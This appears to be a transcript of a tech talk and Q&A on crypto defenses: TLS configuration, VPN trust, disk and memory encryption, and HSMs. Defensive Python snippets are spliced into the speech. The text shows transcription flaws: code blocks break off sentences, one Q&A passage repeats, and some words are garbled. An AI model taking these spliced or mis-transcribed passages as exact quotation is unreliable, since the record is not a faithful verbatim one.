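A rough Python sketch of the pinning idea. The host and fingerprint below are placeholders, and real deployments usually pin the SPKI hash via HPKP headers or pins baked into the app rather than the whole certificate, but the shape is the same:

    import hashlib
    import socket
    import ssl

    HOST = "example.com"        # placeholder host
    EXPECTED_PIN = "..."        # hex SHA-256 of the certificate you expect

    def get_cert_fingerprint(host: str, port: int = 443) -> str:
        ctx = ssl.create_default_context()
        with socket.create_connection((host, port)) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                der = tls.getpeercert(binary_form=True)   # raw DER certificate
        return hashlib.sha256(der).hexdigest()

    # A pinned client refuses to proceed if the presented certificate doesn't
    # match, even when a middlebox offers a "valid" CA-signed look-alike.
    if get_cert_fingerprint(HOST) != EXPECTED_PIN:
        raise ConnectionError("certificate does not match the pinned fingerprint")
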
I’m not gonna get into it now, but a day or two ago on Twitter I posted about, I don’t know, half a dozen different man-in-the-middles, at airports, a lot of them in central Asia, and a lot of them at, like, Marriotts and other hotspots and things. And it’s a problem because
even on like Gogo wifi, they were generating, in real-time, Google certificates,
calling it Google.com, but they didn’t do a great
job and it was kinda broken and they happened to hit
one of Google Chrome’s senior engineering people
who, on a plane ride, said wait why is Gogo com
issuing a Google certificate. So anyway, there’s a whole
sort of ecosystem of people, thinking about ways to kind
of bring these together and enhance the security posture. TLS 1.0, there are mitigations
we can do on browser side, but I mean, I think going
forward we sort of have to consider that kind of gone, unless you really, really
have to support, you know, developing areas where XP
and like Android 2.0 clients are still around, that’s just gone. Yeah, so if you were building a new stack, if you’re building a new application, designing mobile endpoints,
this is a practical matter. There are infinite number of
other primitive constructions that you could use but in terms of Schannel with Microsoft,
in terms of AWS’s endpoint, in terms of iOS, Core Crypto, and so on, this is kind of what you’ve got right now. It’s not great, our options
are kind of limited. As I said the TLS 1.3 draft
19, was just published. I think it’s pretty much done. There may be some tweaking
but I think we’re, we’re pretty close. Here are a few things, just
some top-level highlights. You must implement AES-GCM, which is an authenticated cipher suite. You should implement, among others, ChaCha20-Poly1305. So ChaCha is an alternative to AES which is dramatically faster, even on similar hardware. A lot of smaller devices don’t have decent AES acceleration hardware, and so it’s really useful in that case, in the Poly1305 construct. You must support digital signatures, meaning elliptic curve DSA and traditional RSA certs. You have to support at least one of the NIST curves, the P-256, and then Curve25519. So, point-in-time kind of advice, ’cause these things are moving, right. Prefer forward-secret
authenticated encryption with associated data, ahead of others. If possible explicitly
declare server cipher suites versus wildcards. You see a lot of times in,
in stack overflow and blogs, and things, this is directed
towards the DevOps folks, where you sort of say like
exclamation point, RC4, or wildcards which kind of
give you this whole universe of possible constructions. That’s not recommended. It’s recommended to explicitly
describe, for example, some of those suites. As I said, CBC should be one of the last trusted, in terms of server preference order.
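
A hedged sketch of what explicit, non-wildcard configuration can look like, here with Python’s standard ssl module for a server socket. The exact suite list is illustrative, not a definitive recommendation, and the file paths are placeholders:

    import ssl

    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # no SSL 3, no TLS 1.0/1.1

    # Name the exact forward-secret, AEAD suites you want, in preference order,
    # instead of wildcard patterns like "HIGH:!RC4" that pull in who-knows-what.
    ctx.set_ciphers(
        "ECDHE-ECDSA-AES128-GCM-SHA256:"
        "ECDHE-RSA-AES128-GCM-SHA256:"
        "ECDHE-ECDSA-CHACHA20-POLY1305:"
        "ECDHE-RSA-CHACHA20-POLY1305"
    )

    ctx.load_cert_chain("server.crt", "server.key")  # placeholder paths
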
Right. So just a little more fill there. If you’ve seen some of the strings on the bottom, TLS, ECDHE, blah blah
blah, this is more for some of the ops folks that
have struggled with this ’cause if you’ve stared at it for years but you’ve never really quite understood, like what different pieces are, I’ve got some links to the
FBN, which will, I think, make this hopefully more
sane and more predictable. And it literally, with these five suites, depending whether you’re using
an ECDSA or RSA certificate, that’s it. You could support 99.9%
of the modern and slightly crufty web right now with those. Not some giant sort of thing. If you want the giant thing
or your eyes have already glazed over like five minutes ago, just go to Mozilla’s SSL
config generator and read the docs. Let’s talk about VPNs. (laughing) I get this all the time, that VPNs, because of some of the
marketing and things, you know, this is how you get anonymity, this is how you get privacy,
no no no no no no no. What you get is, you’re at a hotspot and you trust not the guy next to you or at a hotel and someone three rooms down who likes to download lots of
free screensavers or whatever and like is a walking
malware lab and, you know, you don’t want that. A lot of VPNs, by the way,
and I’ll say this too, don’t just walk, run
from any free VPN service because it’s almost guaranteed
you’re gonna be part of a bot mesh network and
you’re the product for that. But anyway in terms of the
commercial service providers, these are really hard things
to do, to run that scale, proxies with, you know, fairly
complicated network set-ups, and we’ve seen repeatedly
where you’re not only trusting the endpoint, their
virtual server in Germany or Switzerland or wherever, you’ve opened up your internal interface. So that means 150 people that
are on that particular node, they’re seeing your inside home network. It’s dual-homed, it’s dual-bridged. Like that’s how broken
some of these things are. So what do VPNs actually provide? They’re just shifting the trust endpoint. They may provide, if
they’re done properly, confidentiality via encryption,
but for what it’s worth, about one in six Android
VPNs, they don’t even encrypt. They don’t encrypt. I’ve got a link at the bottom
there’s a research study that came out a couple of months ago. It’s a disaster. They do not guarantee
anonymity and privacy with this caveat right. I suppose, in isolation,
if you have a clean, you’ve paid with Bitcoin
or cash at Best Buy, and you weren’t on camera and, you know, you trust that laptop and
you do all this stuff. And that’s it and you go to like one site. Yeah, you have some properties of this. But nobody does that right. Nobody does that. They turn the VPN on, they forget about it and then they log into
Facebook and Twitter and Instagram and right. All right so enough of the mini-rant. Let’s go onto some other crypto defenses in terms of disk and volume. Why do you care? Why would you care about
locking these things down. If we’re not talking about laptops, well actually let’s talk
about laptops for a second. If you, one of the best use
cases for disk encryption, for whole volume encryption, is laptops, because if you’ve got PII,
you’ve got HIPAA covered data, you leave your laptop in a cab, that’s an awkward conversation
with your IT folks, and a new laptop and then you’re done. If it’s not encrypted, that might be Office of Civil Rights, with HHS, and a multi-million dollar problem. So flip on, flip on full disk encryption. But putting the laptop piece aside, let’s talk about servers. Let’s talk about points of service. I don’t know if you guys know this, this Marco Arment, he created Instapaper. He was one of the, I think
the original founder, one of the CTOs of Tumblr. This was like a year and
a half, two years ago. He, his phone cert’s going
nuts with messages because his Instapaper service is just down. It’s kind of a bookmarking site but it’s really cool and
well-designed and all this stuff. Turned out Marco was fine, he
wasn’t doing anything wrong, but somebody who was
doing not nice things, at Marco’s web hosting company, on the same rack, got a visit by the Feds and so they took the whole
rack, including Marco’s. That’s probably the more
common kind of thing, right. But, on the other hand,
there are things like, government and civil capture. He discovered these kind of things. If there are data that are mirrored, you probably want to have
full transparency into that. You probably don’t wanna, have that happen without your knowledge right. So there are lots of, in a shared infrastructure environment, Amazon, Google, so forth,
they’re probably not quite as applicable as more like
the regional data centers. But this stuff happens all the time. The other thing that we do worry about is, what about the Cloud apocalypse, right. What if we break out of Xen or KVM, or whatever the virtualization piece is, and whoever happens to be on your node can now see your stuff, right. To their credit, Google with Xen and, I’m sorry, Amazon with Xen and Google with their Compute Engine, they’ve got heavily customized versions of Xen and KVM respectively, but a lot of people don’t. A lot of mid-level and sort of other players don’t. They’re just running, like, stock Xen. And so, you know, we
do have breaks, because weird things happen, like strange Sound Blaster emulators and other kinds of weird, you know, QEMU device drivers get exploited, and so you have these, you know, escalations where basically one of the other people that are sharing your Cloud
Instance, could break out. Multi-tenant media reuse. The other thing too is, I
covered a story in Wired about two years ago. I was on, let’s call it a top
five Cloud provider’s server, and I don’t even remember
why I did this exactly, but I was mucking around with dm-crypt and I meant to do the Unix cat command on this encrypted volume,
to test something. But I ended up doing it on
basically the raw volume that you get. And I was getting people’s
passwords and user names and weird like, My Little
Pony kind of stuff and, (laughing) I’m like what, what is this. The Cloud provider wasn’t
initializing the hard drives between customers right. So you’d spin up an instance,
you’d run your web server, you’d do whatever you’re gonna do, and then you’d turn it off right, that’s the use case for most Clouds right. They didn’t initialize the drive and so whatever was written by
whoever happened to be on that hard drive on that Cloud provider, I literally was seeing like,
you know, the goods so, that’s another great reason
why you might wanna do full volume encryption. In the case of Amazon and Google, they’ve made attestations
to the Defense Department, to the Federal Government,
from their senior executives, under risk of going to prison
if they’re misrepresenting, about their controls around
how they rip disks out and how they destroy them and so forth. So I think you’re probably okay but, every other provider and most, and anything that you’re doing in-house, in terms of your own hosting,
disks get repurposed, servers, maybe you don’t care about them getting stolen, but disks die, they end up in a box, maybe they end up in another box, maybe they end up in another
room and at some point, maybe they get trashed
or maybe they end up on Craigslist or Ebay and if that’s, if you don’t have full volume
encryption, that’s a problem. Content repudiation, I don’t,
I don’t think that’s quite as relevant but the idea there
is that there is information on a machine that you want
to be able to point to specifically and say,
that is my data, it’s not, and so encryption can help in that sense. Data-at-rest compliance, that’s just a given. The standard practice for HIPAA-protected data, for example, is you encrypt your disks at rest. Adversarial admins, incompetence, live VM motion. VM motion’s interesting. So do people know about this, live VM motion? VMware created the original,
I believe created the original sort of version of this. The idea is that you’re
running a live machine, you’ve got dozens, hundreds of processes. You’re listening on network ports. You’re running a database. In real-time this technology
captures the state of the CPU, the state of memory, the
state of the hard drive, and the state of all processes, moves it to another machine
live, with like binary deltas, and you don’t, you know, you don’t lose, you don’t have to reboot. There’s like black magic voodoo in there that I don’t really understand, but one of the things
that occurs to me is, well, hmm, what if we’re,
so when we move those data, data from the disks are coming over too, we trust ourselves, we
trust point A, point B, do we trust the person in between? And I don’t mean trust in like a, there’s a black van I’m
paranoid about outside, I mean trust as in like
to do the right thing. But not just on disk, so
if you think about it, now Google has a similar, I’m
not sure how it’s branded. But a similar like no
downtime kind of feature for some of their Cloud instances. But that means that they’re taking memory and running processes and
managing it on your behalf, and moving it. So if you’ve got, for
example, sensitive data, confidential information, keys, whatever, you’re trusting them. There’s a whole host of
reasons you probably, you know, like, you’ve
already trusted so much and sort of delegated so much already, but that is, that is another use case. Memory encryption. Cold boot attacks, so
I don’t know if folks are familiar with this, you
don’t see this quite as much but the idea is that when memory fades, it takes between seconds and minutes and if you’re, like a
really determined adversary you can physically take
memory out of a machine and bring it back up. It’s more kind of kind of like, you know, James Bond-ish and stuff. What’s, what’s, I mean, you know really, if Langley or like Fort
Meade is your adversary this is the last thing
you need to worry about. Multi-tenant reuse so, on a big host virtual
machine, memory’s chopped up. What if there’s a break? What if there’s a, you know,
a puncture through that? What if another person
sitting on an instance can get host and then back into your, into your live memory. That actually has happened a few times. As I mentioned the live memory snapshots. There’s not a whole lot
that’s, I can talk about, that’s happening. There’s a company called PrivateCore, that Facebook acquired about a year
and a half ago, two years. Incredible technology, and
I hope they open source it. But they were literally
doing, like, L2 cache, on-chip, on-CPU encryption. In other words, the memory that’s used for the L2 cache was actually being used
to encrypt and decrypt on the fly so that raw memory
was encrypted natively. Very cool technology. But I haven’t seen a
whole lot of other sort of similar solutions to that. Data in use encryption. This is transparent data encryption. Property preserving encryption. There’s some interesting developments but, I think it was the December
Real World Crypto at Stanford, or maybe it was New York, but anyway, they’re academically promising
things that are happening but in terms of the actual
commercial product space for Property Preserving Encryptions, the idea is that you could
have social security numbers, credit card numbers, things
like this, you could sort them, even though they’re encrypted. Even though you’re blind to what they are, you can still do those operations on it. There, we’re still struggling
to get a performant decent solution for that. It’s to the point that
there at least a couple of commercial solutions where
it’s a glorified XOR, it’s a glorified Caesar cipher
to break that stuff right. So there’s some interesting
things happening academically but I’m not seeing a whole lot that’s super-trustworthy out. Blackbox custodian is another use of this. I see this in some defense installations and some financial
institutions where for example you have a big Oracle implementation. You’ve got a system
DBA, an application DBA, a privilege DBA and
different like table spaces are encrypted both on disk and in memory, in such a way that the theory goes, all but the master keyholder are blind to other people’s information. It’s all about delegating
trust ’cause at some point there’s gonna be a keymaster, and if that person’s untrustworthy
they can do bad things. The last piece on
hardware security modules. I do wanna leave a few
minutes for question so we’ll wrap it pretty quickly here. Just, if you haven’t been
following this too closely, I don’t mean the hardware
security modules that cost like thousands, or hundreds
of thousands of dollars, that are like NIST certified, I mean hardware security
modules in the sense of, you get them by the hundreds
or thousands on a tape reel, they’re a dollar, $2 now
in volume for, you know, a pretty capable hardware security module. Financial institutions,
lot of regulated spaces use the sort of NIST blessed,
you know, the FIPS compliant hardware security modules. They do it for some of
these reasons right. It’s delegating and
making it very difficult, so the thinking goes, to steal keys, or seeds for token
generation and so forth. Do you guys have, I don’t
know if I can even ask that, but are you looking, or do you have, I mean is there, are there
HSM’s here or do you have proprietary, right right. Yeah we should probably talk
later ’cause there’s some. (laughing) There’s some, there’s
some just staggeringly bad implementations of HSM’s
on the commercial market. And you’d think for like
a hundred thousand dollars you’d get better than,
your old version of Debian that’s unpatched and,
you know, can be routed. But that’s another conversation. So this is how, you know,
these are some sort of top-level things, ways
I’ve been thinking about some of the crypto defenses. There’s a map at the end,
this kind of maps it out into those top-level areas. There’s some more specifics
in here and it links the end. I don’t know if you guys
know this guy, excuse me, Ange Albertini. He was one of the people
on the SHA Collision Team. He’s also like a
brilliant graphics artist. Crazy, like really good,
security researcher and applied crypto guy and like great artist. He was playing around
with this, this diagram, and he came up with like the,
you know, the cyber version, I thought it was kinda cool. I was thinking for, you
know, the display purposes. But Ange wasn’t thinking that way. Ange was thinking well, you know, we can do a polyglot
that’s both a GIF and HTML. Or pdf and JavaScript. Excuse me. Script source=polyglot
blah blah blah .gif. Image source=polyglot.gif, what. You can use a gif as a basis
for JavaScript execution? Yes, yes you can. (laughing) So if you download my diagram
you can either run it as, in your browser with an HTML extension, it’ll say hello world. Or you can just view it but, that’s crazy stuff. This was before the SHA-1 collision, that’s the same file by the
way, that’s what the trick is. I’ll just go through these super quick. So there are a couple of
things to be aware of. I love this, formal software verification. The DARPA drone project, I don’t know if people are
aware of this broadly but, so this, this took place
like two or three years ago. It got a tiny bit of
splash but not a whole lot. DARPA does all these kind of
interesting innovational awards that, you know, the Defense
Department’s R&D group. They had this question which was, could you make one of these
little quadcopter drones. Could you do a fully,
formally verified drone? And so got together people
that are in formal methods, and verification, and in mobile security, and guidance systems. And in the span of like 18 months, yeah, they built an entire from the ground up, fully verified little drone that has fully verified navigation,
geolocation, instrumentation, communications, from
the ground up rewritten. The headlines were hacker-proof drone. That’s not exactly true. But the, but by dramatically
reducing the surface area and compartmentalizing the
security guarantees of this thing this is like, this is a major
thing and people were like, oh that’s kinda cool, and this went on. No no no this may be like a
fundamentally different way of thinking about what’s
possible in kind of the consumer space, and
automotive space for example. So I don’t know if people
are broadly aware of this but the top four Cloud players are rewriting their network stack. Right so, Google two years
ago, after Heartbleed, they did a fork of OpenSSL and it's called BoringSSL. Amazon's s2n, I think it's signal to noise, Apple's CoreCrypto and Microsoft's Schannel. They're all getting refactored
and have been undergoing this process for like, you
know, a couple of years now. But they’re actually going
through a formal verification and proofs of construction
for their security properties, at the protocol layer. I mean that’s really
interesting and exciting. The CyberUL Project from Mudge. I’ve got some other links,
as I say, at the bottom. It’s definitely worth checking out. The idea is that this
would be sort of like a, what, a Consumer Reports, like an Underwriters Laboratories kind of thing, but, you know, in the consumer security space. So if you have a baby monitor,
it’s not saying this is like hack proof, but there’s a
minimum baseline level of, you know, maybe you shouldn’t
be using like, you know, Apache 1 and you know, Telnet, with default passwords and things. So there’s a whole, the idea
is to really bump up kind of the baseline for the consumer product space. I don't have time for these
but I’ll leave some links at the end. These are some other cool things, if you’re into sort of applied crypto and where we might be
able to use some of these solutions I mentioned. But really it comes down
to first principles right. Security hygiene, trusted supply chain, the root of trust. I saw this by John Lambert from Microsoft. There are simple, I know
this isn't a Windows shop but, there are simple policy mitigations that can be done to block an enormous amount of corporate threats. People doing things as simple as taking kind of esoteric file types that we don't see in the wild as much and mapping those to Notepad and other things that are not an executable. Sort of interesting. If there are 4,300 different trusted roots in your certificate store in your browsers, there are people that have been thinking about: are there ways that we can really reduce this? Maybe I have no business with the Polish government. Or maybe I'm in Poland and I have no business with, you know, the Chinese Defense Department, and so some of their certificates and things are not relevant to me. Sort of reducing that.
But I also think that we're seeing some interesting, really practical approaches to this as well. If This Then That. I mean, why not do simple things like this? If most of the consumer
apps that have tie-ins, like authorized apps, did something like this, I think we'd see a whole lot fewer hacks, right. Instead of, oh yeah, I tied my Tumblr account to Twitter five years ago, and it's still there, and it's active. So sometimes it's thinking simple, not, you know, not complex.
And just remember this picture. And I'll leave it here too. This is something I really wanna emphasize to everyone I talk to. I go to these crypto meetings two or three times a year. Some of the best in the world, but sometimes people who
have such incredible depth, you hit a point and it’s just
a cliff of like, I don’t know. This, your black box
is what I do every day, but I don’t know. So, like, I’m not a protocol guy. Oh yeah I’m a, you know, I’m a, you know property preserving
encryption expert. I’m a formal methods person. I have no idea about like
real world, you know, web server vulnerabilities and things. There is a collection of knowledge that, it’s the, it’s encompassing all that, to sort of bring these things together. If it feels like when you’re
working one of these areas, that you’re really out of your element, I just like the way this is described, because these are
difficult and complicated and deep, you know, deep issues. Right. This is a quote by Matt
Blaze I thought was great. If nothing else, this is when the California Apple case was happening. A basic security principle: design your systems so that even you can't attack them. Now if you guys saw Apollo
13, I love this line. I don’t care what anything
was designed to do, I care about what it can do. That should be your
mantra in thinking about security defenses. Don’t care what anything
was designed to do, care about what it can do. And always be flexible. We’re done. (audience applauding) – Great thank you Kenn. Any questions from the audience? Josh. The catchbox might not work hang on. – [Kenn] By the way
that was 174 slides so, not bad, in just over an hour. – [Mike] All right question
from the YouTube live stream. This is actually from our CTO Jon. He’s asking, how terribly
do you think we're gonna botch TLS 1.3 0-RTT, zero round trip. – [Kenn] You know, it's
a little out of my lane. What I can say is that we’re
gonna botch TLS 1.3 in general in a whole lot of different ways. (laughing) So one of the best examples is, Google, whatever else you think
about them they have some really, really
brilliant network engineers, that have been thinking about
a lot of difficult problems with compatibility and
backwards compatibility and things for a long time. I don’t know if you saw the
story of maybe six weeks ago. A major school system in Maryland, it’s called Montgomery
County, they’re huge, had hundreds of thousands
of Chromebooks that just died one day. Like what? So Google had turned on TLS 1.3, not because normal mortals use it, 'cause it's not really even
enabled in modern browsers, but sort of probing, because monster things
like Akamai and Cloudflare, you know these huge global
content distribution systems, have slowly been rolling
out TLS 1.3 for a while. Well it turns out it
wasn’t the Chromebooks who were barfing on TLS 1.3, it was their man in the middle network box that they had installed
at all these schools, that went to do the negotiation, and it really is this simple. Hello, I speak TLS 1.0, 1.2, 1.3, or whatever; what do you speak? I speak TLS 1.3.
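For a minimal sketch of that client-side negotiation, here is a probe using Python's standard ssl module; the hostname is just a placeholder, and the versions offered depend on your local OpenSSL build.

```python
import socket
import ssl

# Offer TLS 1.2 and up, then report what the server (or whatever middlebox is
# sitting in the path) actually negotiates.
def negotiated_version(host: str, port: int = 443) -> str:
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.version()  # e.g. "TLSv1.3" or "TLSv1.2"

if __name__ == "__main__":
    print(negotiated_version("example.com"))  # placeholder hostname
```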
And so these admins came in, and hundreds of thousands of kids' and teachers' Chromebooks were just spinning, you know, rebooting themselves, so Google had to turn it off. Anyway, these are not cheap devices. These are multi-hundred-thousand-dollar boxes; you get a consultant team, an army, for like two years, to kind of eke out something that sort of works. So yeah we're gonna be seeing
a lot of pain through that. But I don’t think it’s unique to TLS 1.3. They’ve gone through a lot of work to get the backwards compatibility right. Corporate America loves their
man in the middle boxes and you know, we’ll see. But no I, in terms of the Zero RTT, I think that’s gonna be an
instance of this sort of thing where things are gonna die
inelegantly but, you know, people will patch and move on. – [Mike] Other, other questions. Yes. – [Man] Does this actually work, oh. – Hey it does. – [Man] Um so it was interesting I mean, I love all the technical stuff and all the man in the middle challenges
and all those other things but of course many of
the security problems that we have seen are human, right. Like John Podesta, oh by
the way here’s my password. Things like that. So who is doing research
on user experience and how that folds into security because easier installation
of certificates with verification would be one thing, also making sure that you
can verify that whoever is asking you for your password
is a legitimate actor, things like that. – Work is going on, I
can’t say specifically who’s doing that, it’s
kinda, it’s outside my lane, I don’t know if you wanna chime in. – [Mike] Yeah I mean I
would check out like SOUPS which is the Symposium on
Usable Privacy and Security. Lot of great work coming
out of Carnegie Mellon and a lot of other institutions. Chrome Security Team,
especially like on their work on Enamel, which is secure design. – [Kenn] Oh yeah right. – [Mike] Great stuff to check out yeah. – [Kenn] I know there’s a group at IU, at Indiana University,
that’s thinking about this. But even, you know, it
gets a lot of press. I don’t know how widespread Signal is like in actual deployment versus WhatsApp and all these other things. But even Signal is like
actively hiring designers because things like, you
start an encrypted voice call, and there’s two or three words, and you say those words
to the other person, that’s brilliant. Why do we go like, through
all the machinations of PGP, awfulness, before somebody said you know, there’s this actual usability
thing we should think about. – [Mike] But then you
wouldn’t get the annual why Johnny can’t encrypt rehash. – [Kenn] That’s right, that’s right. – [Mike] Other questions? Yeah. – [Man] Ah so one of the
questions that I had about TLS 1.3 I don’t know if you had
seen the developments coming from Matthew Green
on behalf of US Bank, where they were talking
about basically they need to be able to sort
of bypass the PFS stuff. They want to be able to,
you know, have an option to have static
Diffie-Hellman keys in there. So this isn’t something that
is designed to, you know, sort of improve the end-user’s security, this is hey, I need to
by-pass this security feature. So I guess my question is, you know, in terms of the trade-offs
that they’re making on that, what are your thoughts
on that proposed change to the TLS 1.3? – [Kenn] I’ve seen massive
outcry and backlash to that. But I wouldn’t for a second
claim to have any insights into the psyche of the IETF world. It's just, it's like you go
in it and then you’re just never seen again, except on email lists that go on forever. I actually don’t, I’m not too concerned some of those truly last
minute 11th hour requests, are actually gonna get ratified. I just, you know, having, having interception by design, it just seems, you know,
it’s just backwards. That said, you know, there, you know, if major financial
institutions have, you know, people on these committees
that have been working earnest for years, they have a voice. So I’m not too concerned about it but nothing would surprise me. Which by the way and
that’s one of the reasons that you have five different
kinds of VPNs, right. You've got IKEv1, v2, you've got L2TP, you know, encapsulation. Then you've got Cisco's version. Hopefully we won't see something
like that with TLS 1.3. – [Man] You touched on the
certificate authorities and how we inherently trust them, whether or not they deserve that trust. Are there other ways that
are likely to catch on to, you know, provide that trust for browsers and other applications, than this model where someone blesses
the certificate authority from a central location. – [Kenn] Sure, you know. When I first started I
used to think that self-signed certificates were like this lazy hack. And the longer I thought about it, I finally realized, no,
that’s actually in some ways the most secure. If I actually control the endpoints. If I’m able to, with full
spread on all mobile devices and all desktops, put my keys on, that’s sort of the best
situation right, because, and it’s not just browsers right, so don’t get browser centric. On any given Linux box there’s five, 10, 30 certificate stores. Every app may come with
one, which may or may not have got an update in the last two years, which may or may not still be vulnerable to Heartbleed, help us. I mean we see that all the time. But Wendy and I were
talking just earlier that there is this notion of, you know, the certificate authorities
are voting to drop it down to 30 days, 60 days, I mean
these are serious discussions. So this notion of like
truly long-term three year trusted on high, I think people
are sort of thinking about there are different ways to do that. – [Mike] Other questions? Okay. All right one more from YouTube. What’s the most promising, interesting, or important new crypto defense you see coming down the pike
– [Mike] Other questions? Okay. All right, one more from YouTube. What's the most promising, interesting, or important new crypto defense you see coming down the pike in the next few years? Differential crypto, or privacy rather, PIR, which I believe is private information retrieval, or something else. – [Kenn] Some of the
differential privacy stuff is really interesting so, I don’t know if people follow
this so much but there’s Apple among others is
shipping really powerful neural net code on devices, because, you know, modern mobile devices are actually getting,
you know, pretty speedy. They’ve got an entire R&D
group thinking about ways to do this where you can, for example, do public health type surveillance, but preserving, you know, preserving the protections of identity. I say promising because
it’s actually shipping and there’s some interesting
health applications coming out of it. There may be dozens of other things just not on my radar but that’s something to definitely keep on the lookout for. – [Mike] Yeah. – [Man] Hey I was curious
in terms of like the Google BeyondCorp stuff, that's, I'm not sure if you've
got to see or, okay. Just was wondering if
you’d seen it or had any comments on it. – [Woman] We’re all about that here. – [Kenn] Okay. – [Man] It’s also why I thought
it would be maybe a good. (laughing) – [Woman] So a lot of this
deep dive into how these things work, how they're flawed, and how we're trying to do better is fascinating and all, but for a lot of people in DevOps and, the security analysis, design, information assurance, and incident response type stuff, a lot of that is inaccessible.
we’re doing what we’re doing. Do you have any thoughts or wisdom that you could
share regarding, you know, communities that we can touch base with. Security benchmarks for the
applications that we have and things like that, in
order to reduce the likelihood that threat actors could
potentially take advantage of vulnerabilities in the configurations of our systems. – [Kenn] Right, that’s a great question. So the question was around, sort of, getting acclimated to, deeper areas of security awareness, what communities, what resources, I think that’s sort of
where you’re going and, and then actually what
are actionable things you can do to sort of make progress there. One thing that people are doing, I think it’s been happening
for a long time, but they're talking more about it, are these tabletop scenarios, right. There are actually Twitter bots
now with tabletop scenarios. So one of the tabletop scenarios is, your DNS got owned. Let’s pick Go Daddy
because, you know, Go Daddy. And somebody, for some period of time, put up a phishing page,
but with your domain name, and with your certs, and your
employees, or your customers were entering their credentials,
and you just discovered it. What do you do? Wow. So I mean, so these, I mean
that’s just one example, but the sort of scenarios to
go through to really push hard about okay, well what does
our incident response look like and what does our risk
profile really look like and what is our, you
know, PR strategy here and do we, have we
really thought, you know, yeah we know network
segmentation’s important but we didn’t really do it. I mean, a lot of these, the benefits of those kinds of scenarios, are A, it’s multi-disciplinary, you have a lot of different
people with different hats on the table, thinking about problems, when you have time to breathe and think. One of the most valuable things I ever did when I was more into
the architecture space. I was on a project just out of school, and
the managing VP was like, none of you 12 people know
anything about Oracle, and it really ticks me off
’cause we’re billing out huge rates that say that you’re, you know what you’re doing with Oracle, so we’re gonna send you
to Oracle Headquarters for like six weeks of boot camp. Okay. But one of the things that
Oracle brilliantly does when they train their DBAs in-house is, you drill again and again and again. You do these labs where
data files are corrupted where back-ups are corrupted,
where archive redo logs are corrupted, and you sit at
the keyboard, and you fix it. And you do it again and again and again until it’s just automatic. Now we can’t predict you know, all the different scenarios, but you can get a lot
of insights and a lot of interesting ideas from
these tabletop scenarios. So I think that’s one place to start. There’s countless
possibilities for, you know, kind of community things. I would probably not recommend
the DEF CONs and Black Hats of the world. I would recommend, no, I mean in terms of operational stuff, there are lots of
DevOps kind of things that are, that are sort of less, you know, they get less attention, but
it’s what real-world defenders are doing right now like
what’s actually working. How are people using Vault, for example, to do tokenization. What are people using
with Google Compute Engine and AWS with their key management systems, and cloud key management. And what works, what's painful, what's not. And then how do they implement those.
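On the Vault point, here is a rough sketch of the transit secrets engine used as encryption-as-a-service for tokenization, via Vault's HTTP API with the requests library; the Vault address, token, and the key name "orders" are placeholders, and the transit engine and key have to exist already.

```python
import base64
import os
import requests

# Encrypt/decrypt through Vault's transit engine so application servers never
# hold the data key. VAULT_ADDR, VAULT_TOKEN, and the key name are placeholders.
VAULT = os.environ.get("VAULT_ADDR", "http://127.0.0.1:8200")
HEADERS = {"X-Vault-Token": os.environ["VAULT_TOKEN"]}

def encrypt(plaintext: bytes) -> str:
    b64 = base64.b64encode(plaintext).decode()
    r = requests.post(f"{VAULT}/v1/transit/encrypt/orders",
                      headers=HEADERS, json={"plaintext": b64})
    r.raise_for_status()
    return r.json()["data"]["ciphertext"]  # e.g. "vault:v1:..."

def decrypt(ciphertext: str) -> bytes:
    r = requests.post(f"{VAULT}/v1/transit/decrypt/orders",
                      headers=HEADERS, json={"ciphertext": ciphertext})
    r.raise_for_status()
    return base64.b64decode(r.json()["data"]["plaintext"])
```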
I mean there are, you know, there are different creative ways to do that. But I think thinking through some of the worst possible things is a great way to kind of, you know, get these conversations going. – [Mike] Any other questions for Kenn? Any other questions for Kenn? Yeah. Are there any VPNs you like Kenn? – Yeah so I'm actually
giving an entire talk at the International
Cryptographic Module Conference in May in D.C., but the preview of that is, it's a very short piece
of advice which is, you probably, if you’re in this room, you’re probably capable
of running your own. And if you’re gonna run your own, don’t look at blogs, don’t
look at, you know, these, your cousin’s advice and stuff, look at some of the best
people in the world, who do mobile security for a living, at a real, you know, depth. And those people are from the Signal team, and they're from the Trail of Bits
team and this sort of thing. So Streisand and Algo VPN, two of the strongest curated, well-maintained, mature,
sane security defaults. You can set up an Algo or a Streisand in an hour or two, you
know, it’s easy to do. If you’re asking me what
do you tell your cousin that bugs you at holiday
dinners, you know, there are a couple of decent
companies that seem to have decent anti-features right. What they don’t promise and what they are very particular about saying, these are the pieces
of information we keep. And yes if we’re served with a court order of course we’re gonna do that. If a company brags about
Bitcoin and anonymity and not logging, I don’t believe them, and I don’t think you should use them. So Cloak and TunnelBear
are two services that have engaged outside credible
third-party firms. I’ve seen the audits from
one of those organizations and they’ve done a lot of
work to improve their posture, but more importantly
the fact that they even asked for that help, puts
them in the 99.99th percentile in the industry. If you follow me on Twitter
occasionally I’ll post updates and things but yeah, I’d say, the vast majority of consumer VPN services are either actively malicious
or incompetent or both (laughing) and even if they have
elements of a tech stack that are okay, they're offering
terribly insecure defaults for a good part of their customer base and they just don’t care. And search engine optimization
gaming, these are, you know, these are seven,
eight figure ad buys. Best VPN. Recommended VPN. Those are seven, eight
figure ad buys on AdSense so I mean if you start with
Google and get, you know, PC Magazine and sort of editorial reviews, they just don’t have
the capability to make any kind of security assessment. They’re gonna go on features, and price, and this one’s at 12.95,
but this one’s 6.95, so that’s their number
two editor’s choice award. Like wow, okay. – [Mike] Cool any last questions? All right so I just wanna thank everybody for attending tonight. I wanna thank Kenn for
coming up to Ann Arbor, so let’s give Kenn a round of applause. (applauding) Thank you all again for coming and just be on the lookout for the
next Tech Talk announcement on the meet-up site. Thank you. – [Kenn] Thanks.
